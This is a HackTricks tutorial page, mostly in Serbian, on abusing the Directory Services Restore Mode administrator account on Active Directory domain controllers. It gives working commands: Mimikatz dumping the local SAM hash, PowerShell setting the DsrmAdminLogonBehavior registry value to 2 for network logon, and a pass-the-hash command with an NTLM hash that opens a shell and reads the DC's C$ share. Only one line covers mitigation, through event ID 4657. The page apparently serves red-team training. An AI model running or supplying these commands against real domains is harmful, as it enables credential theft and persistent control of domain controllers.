hacktricks/windows-hardening/active-directory-methodology/dsrm-credentials.md

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

DSRM Credentials

Postoji lokalni administrator nalog unutar svakog DC. Imajući administratorske privilegije na ovoj mašini, možete koristiti mimikatz da izvučete hash lokalnog Administratora. Zatim, modifikovanjem registra da aktivirate ovu lozinku kako biste mogli daljinski pristupiti ovom lokalnom Administratoru.
Prvo moramo da izvučemo hash lokalnog Administratora unutar DC-a:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

Zatim treba da proverimo da li taj nalog funkcioniše, i ako registracioni ključ ima vrednost "0" ili ne postoji, treba da postavite na "2":

Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"

Zatim, koristeći PTH možete navesti sadržaj C$ ili čak dobiti shell. Imajte na umu da je za kreiranje nove powershell sesije sa tim hash-om u memoriji (za PTH) "domen" koji se koristi samo ime DC mašine:

sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$

Više informacija o ovome na: https://adsecurity.org/?p=1714 i https://adsecurity.org/?p=1785

Ublažavanje

• ID događaja 4657 - Revizija kreiranja/promene HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior

{% hint style="success" %} Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Podržite HackTricks

• Proverite planove pretplate!
• Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
• Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

{% endhint %}